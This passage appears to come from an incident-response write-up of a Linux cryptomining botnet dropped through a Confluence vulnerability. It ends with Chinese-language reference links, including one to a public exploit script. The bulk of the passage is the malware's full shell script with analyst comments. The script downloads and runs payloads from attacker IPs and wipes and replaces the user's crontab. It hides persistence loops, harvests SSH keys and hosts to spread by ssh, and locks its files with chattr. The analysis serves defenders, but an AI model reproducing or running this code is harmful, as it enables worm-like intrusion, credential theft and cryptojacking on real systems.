				        cp $DIR/x86_643 $DIR/x86_64
            ;;
            *)
                echo "x86_64 wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
	# Fetches the payload for this architecture ($url/$(uname -m)) into
	# $DIR/dbused and, when its md5 is one of the known-good values, refreshes
	# the cache — note the copy source is $DIR/x86_64, not the file just
	# downloaded.
	get $url/$(uname -m) "$DIR"/dbused
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/dbused | awk '{ print $1 }')
        echo $sum
        case $sum in
            dc3d2e17df6cef8df41ce8b0eba99291 | 101ce170dafe1d352680ce0934bfb37e)
                echo "x86_64 OK"
                cp $DIR/x86_64 $DIR/x86_643
            ;;
            *)
                echo "x86_64 wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}

judge() {
    # Starts the payload unless a connection to one of its peers
    # (212.114.52.24:8080 or 194.5.249.24:8080) is already ESTABLISHED.
    # The binary is run twice, with '-c $dns' (dns set above) and '-pwn'.
    # Both peer addresses are egress-block candidates next to 209.141.40.190.
    if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
    then
        get $url/$(uname -m) "$DIR"/dbused
        chmod +x "$DIR"/dbused
        "$DIR"/dbused -c $dns
        "$DIR"/dbused -pwn
        sleep 5
    else
	echo "Running"
    fi
}

# Same peer check as judge(), widened to LISTEN/TIME_WAIT, gates the first
# start of the payload.
if [ ! "$(netstat -ant|grep '212.114.52.24:8080\|194.5.249.24:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
    judge
else
     echo "Running"
fi

# Second payload, 'bashirc' for this architecture, fetched and run only when
# there is no ESTABLISHED connection to 104.168.71.132:80. This is the
# /tmp/bashirc from the /tmp listing above, still running from a deleted
# inode in the lsof output.
if [ ! "$(netstat -ant|grep '104.168.71.132:80'|grep 'ESTABLISHED'|grep -v grep)" ];
then
    get $url/bashirc.$(uname -m) "$DIR"/bashirc
    chmod 777 "$DIR"/bashirc
    "$DIR"/bashirc
else
	echo "Running"
fi

cronbackup() {
 # Fallback persistence for when cron is not usable. 'pay' is the same
 # download-and-execute chain, except that this variant ends in 'rm -rf $DIR'.
 # '$me' is never assigned anywhere in this listing, so "$me" != "root" is
 # always true and the "custom backup" branch runs regardless of cron state:
 # a 'while true; do sleep 60 && <payload>; done' script is written to a
 # randomly chosen writable directory, started with nohup and deleted 15 s
 # later, leaving it running from an unlinked file — the same pattern as the
 # '(deleted)' entries for /tmp/bashirc and /tmp/quu in the lsof output.
 # If only atd is active, the payload is queued with 'at' instead.
 pay="(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR"
 status=0
 crona=$(systemctl is-active cron)
 cronb=$(systemctl is-active crond)
 cronatd=$(systemctl is-active atd)
 if [ "$crona" == "active" ] ; then
 echo "cron okay"
 elif [ "$cronb" == "active" ]; then
 echo "cron okay"
 elif [ "$cronatd" == "active" ] ; then
 status=1
 else
 status=2
 fi
 if [ $status -eq 1 ] ; then
 # Drops every existing at job before queueing the payload.
 for a in $(at -l|awk '{print $1}'); do at -r $a; done
 echo "$pay" | at -m now + 1 minute
 fi
 if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
  arr[0]="/dev/shm"
  arr[1]="/tmp"
  arr[2]="/var/tmp"
  arr[3]="/home/$(whoami)"
  arr[4]="/run/user/$(echo $UID)"
  arr[5]="/run/user/$(echo $UID)/systemd"
  rand=$[$RANDOM % ${#arr[@]}]
 echo "Setting up custom backup"
 # Kills any previous 'cruner' instance before starting a new one.
 ps auxf|grep -v grep|grep "cruner" | awk '{print $2}'|xargs kill -9
 key="while true; do sleep 60 && $pay; done"
 echo -e "$key\n##" > ${arr[$rand]}/cruner && chmod 777 ${arr[$rand]}/cruner
 nohup ${arr[$rand]}/cruner >/dev/null 2>&1 &
 sleep 15
 rm -rf ${arr[$rand]}/cruner
 fi
 }
cronbackup


# Makes sure the user crontab carries the payload: if no entry mentions $url,
# the whole existing crontab is wiped (crontab -r) and replaced with a
# per-minute entry.
if crontab -l | grep -q "$url"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    echo "* * * * * (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms" | crontab -
fi

# Lateral movement. Harvests private keys (id_rsa*, *.pem, IdentityFile
# entries from ssh configs), target hosts (HostName entries, IPv4 addresses
# from bash histories and known_hosts) and user names, then tries every
# user x host x key combination with non-interactive ssh and runs the same
# download-and-execute chain on each host it can reach.
# Every key found by these globs should be treated as compromised and
# rotated, and the hosts reachable from this machine checked for the same
# indicators (cron entries, bot/pwnrigl units, /tmp drops).
KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
USERZ=$(
    echo "root"
    find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh"
)
# nl | sort -u -k2 | sort -n | cut -f2- : de-duplicate while keeping order.
userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
for user in $userlist; do
    for host in $hostlist; do
        for key in $keylist; do
            chmod +r $key; chmod 400 $key
            ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl -fsSL $url/xms||wget -q -O- $url/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("$url/xms").read()')| bash -sh; lwp-download $url/xms $DIR/xms; bash $DIR/xms; $DIR/xms; rm -rf $DIR/xms"
        done
    done
done

# Cleanup, then re-locks the persistence files with immutable/append-only
# attributes — the reason plain 'rm' failed on them during the cleanup above
# until 'chattr -i -a' was applied.
rm -rf "$DIR"/2start.jpg
rm -rf "$DIR"/xmi
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down

参考 https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md https://www.exploit-db.com/exploits/50243 https://cloud.tencent.com/developer/article/1744547 https://bbs.huaweicloud.com/blogs/202738

  1. 漏洞原理 https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

    漏洞利用脚本 https://github.com/h3v0x/CVE-2021-26084_Confluence/blob/main/Confluence_OGNLInjection.py

    官方升级说明 https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
